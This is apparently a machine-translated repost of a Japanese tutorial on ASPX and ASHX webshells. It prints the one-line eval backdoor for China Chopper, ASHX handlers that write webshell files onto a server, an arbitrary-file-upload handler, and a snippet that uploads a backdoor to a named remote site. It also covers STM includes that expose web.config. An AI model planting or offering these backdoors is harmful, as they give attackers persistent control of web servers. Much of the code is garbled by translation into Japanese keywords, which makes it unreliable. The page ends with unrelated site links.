ASHXバックドア[RPM]

その他 2019-09-19 14:50:32 訪問数: null

https://www.cnblogs.com/Fluorescence-tjy/p/9855828.html

まず、標準のASPXワードトロイの木馬
.NETプラットフォームの下の文は百トロイの木馬年で、最も一般的なのは間違いなく次の文章でした

<%@ページ言語=「Jscriptの 」%> <%のeval(Request.Item [ 『パス』]、 『安全でない』);%>
おそらくこの文は、ほとんどの防衛製品の標準サンプルとなっている、ほかにあります言葉の厳密な意味から、このような文アップロードファイルはトロイの木馬、単純なファイルアップロード機能、実際の操作やマレーシアやポニーの運転動作とみなすことはできません。

<%(Request.Files.Count!= 0であれば ){Request.Files [0] .SaveAs(Server.MapPathの(リクエスト[ "F"]));}%>
2、ASHXワードトロイ
ASHX馬HTTPS: //github.com/tennc/webshel​​l/blob/master/caidao-shell/customize.ashx

この馬は、利用できる接続することができ包丁を達成し、または非常に固執するが、ボリュームが大きすぎると、サーバ側での機能のほとんどを実装しているためだけで包丁のクライアントアダプタを行い、より多くの馬のよう実際にありました利用可能。

二つは、ASHX書き込みファイルトロイの木馬
、現在のディレクトリにwebshel​​l.asp文トロイの木馬が生成されます。実装後の馬は、パスワードは、他のファイルを書き込むことができますパスです。

<%@ WebHandler言語= "C#の"クラス= "ハンドラ" %>
システムを使用して、
System.Webのを使用して、
System.IOを使用しました。
パブリッククラスハンドラ:IHTTPハンドラ{

公共ボイドのprocessRequest(のHttpContextコンテキスト){
context.Response.ContentType = "text / plainの";
StreamWriterのファイル= File.CreateText(context.Server.MapPath( "webshel​​l.asp")));
file.Write( "<%evalの要求("パス")%>");
file.Flush();
file.Close();
context.Response.Write( "www.webshel​​l.cc");
}

パブリックブールIsReusable {
{取得
falseを返します。
}
}
}

包丁のASPXワードに単語ASPスクリプト - しかし、爆発の間違った時の実行、未知のコマンド@Pageは述べています。そして、使用してそれを解決するには、2つの方法があります。

1.接続文字列文字列

<%@ WebHandler言語= "C#" クラス= "ハンドラ" %>

システムを使用しました。
System.Webのを使用して、
System.IOを使用しました。
パブリッククラスハンドラ:IHTTPハンドラ{

public void ProcessRequest (HttpContext context) { 
    context.Response.ContentType = "text/plain"; 
    string show="<% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"chopper\"]"+",\"unsafe\");%>"; 
    StreamWriter file1= File.CreateText(context.Server.MapPath("root.aspx")); 
    file1.Write(show); 
    file1.Flush(); 
    file1.Close(); 
     
} 

public bool IsReusable { 
    get { 
        return false; 
    } 
}

}
2.愚か法、バーコードは、参照します

<%@ WebHandler言語= "C#の"クラス= "アップローダー" %>
Systemを使用。
System.IOを使用しました。
System.Webのを使用して、

パブリッククラスアップローダ:IHTTPハンドラ
{
公共ボイドのprocessRequest(のHttpContext HC)
{
foreachの(hc.Request.Filesの文字列fileKey)
{
HttpPostedFileファイル= hc.Request.Files [fileKey]。
file.SaveAs(Path.Combine(hc.Server.MapPath()、file.FileName) "");
}
}

public bool IsReusable 
{ 
    get { return true; } 
}

}
そして、書き込みにVS〜主な機能とのWinFormプログラムを作成します。

=新しい新しいmyWebClient System.Net.WebClient System.Net.WebClient();
myWebClient.UploadFile( "http://www.xcnzz.com/Uploader.ashx"、 "POST"、 "C:\ ma.aspx");
3、STM / shtm / SHTMLスクリプト
を直接ウェブシェル得るが、あなたには、いくつかのサーバー情報を取得することができませんが。注STMは、web.configファイルの内容が含ま挙げられます。

現在のファイル名: Webサーバーの名前とバージョン: ホスト名: ポート: 顧客またはプロキシIPアドレス: クライアントや顧客のプロキシホスト名: PATH_INFOの値が、標準の仮想ディレクトリのパスの拡張子を持つ:クライアントへ追加のパス情報:










タグ:ASPXバックドア、バックドアASHX

おすすめ

転載: www.cnblogs.com/mrhonest/p/11546880.html
おすすめ
Open Source Daily | Chrome に組み込まれている Gemini の重要性は、中国の AI 追求に関する 5 つの大きな誤解ではありません。ECharts の創設者は魚を育てるために「海に行った」が、何もありません。驚き
中国のAIチームが「米国のために準備を進めている」という噂にマイクロソフトが反応
ランキング
配列内の重複要素を検索し、繰り返し回数の最小値から最大値までの順に並べ替えます es6
【C++学習記】Ten、C++デザインパターン - 抽象ファクトリーパターン
知人:素人の言語ランタイム(A)に
ist „collision.relativeVelocity.magnitude“ in Unity
Linuxダイナミックリンク(3)のPLTとGOTについて話す-パブリックGOTエントリ
leetcode。図L.207カリキュラム-Java
羅区[] P3518 [POI2011] SEJ、金庫
MySQL にクエリを実行するときに使用するインデックスを指定します
現在のユーザー環境変数とシステムのWin10ベースのビュー
十二の仕事 - あなたの誕生日
アーカイブ
もっと
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(27)
2024-05-11(31)
2024-05-10(33)
2024-05-09(30)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)

コードワールド

© 2018 codetd.com